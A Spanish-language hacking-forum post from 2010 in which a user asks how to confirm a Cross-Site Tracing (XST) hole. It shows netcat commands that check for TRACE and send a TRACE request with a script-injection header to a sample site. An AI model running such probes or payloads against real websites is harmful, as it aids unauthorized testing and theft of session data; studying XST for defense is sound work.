elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Temas
Páginas: [1]
1  Foros Generales / Dudas Generales / Como realizar un XST mediante TRACE en: 31 Diciembre 2010, 00:52 am
Hola
Les cuento lo suguiente
he realizado bastantes escaneos con nikto (excelente herramienta)
la mayoria de las veces las paginas son vulnerables a XST
he leido como realizar este metodo HTTP, pero no se como ver si verdaderamente resulta
haci lo hago

$ nc -v www.ejemplo.com 80
Connection to www.ejemplo.com 80 port [tcp/www] succeeded!
OPTIONS / HTTP/1.O

...
Allow: GET,HEAD,POST,OPTIONS,TRACE
...

Bueno aca nos dice que la opcion TRACE esta habiilitada
ahora, en la pagina busco un search.php o algo haci

$ nc -v www.ejemplo.com 80
TRACE /buscar.php HTTTP/1.0
Host:www.ejemplo.com
XSS:<script>alert('test')</script>


...
...
...
TRACE /buscar.php HTTTP/1.0
Host:www.ejemplo.com
XSS:<script>alert('test')</script>

Ahora en la pagina noce que hacer para ver si verdaderamente resulto
el XST mediante TRACE.
Definición XST: http://en.wikipedia.org/wiki/Cross-site_tracing
SAludos
Gracias por las respuestas
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines